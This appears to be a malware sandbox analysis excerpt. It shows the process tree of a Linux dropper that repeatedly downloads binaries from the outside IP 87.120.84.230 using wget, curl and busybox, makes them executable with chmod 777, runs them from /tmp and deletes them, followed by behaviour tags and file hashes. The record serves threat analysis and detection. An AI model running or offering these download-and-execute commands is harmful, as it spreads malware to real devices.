/bin/rmrm NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:973
-
-
/bin/chmodchmod 777 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC./iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:976
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:977
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:979
-
-
/bin/chmodchmod 777 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4./8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:982
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:983
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:985
-
-
/bin/chmodchmod 777 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a./Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:988
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:989
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:991
-
-
/bin/chmodchmod 777 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- File and Directory Permissions Modification
PID:992
-
-
/tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q./YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- Executes dropped EXE
PID:993
-
-
/bin/rmrm YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:994
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:995
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:996
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:997
-
-
/bin/chmodchmod 777 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- File and Directory Permissions Modification
PID:998
-
-
/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX./jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵
- Executes dropped EXE
PID:999
-
-
/bin/rmrm jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:1000
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:1001
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1002
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:1003
-
-
/bin/chmodchmod 777 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr./9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr2⤵PID:1006
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:1007
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:1009
-
-
/bin/chmodchmod 777 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu./VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu2⤵PID:1012
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97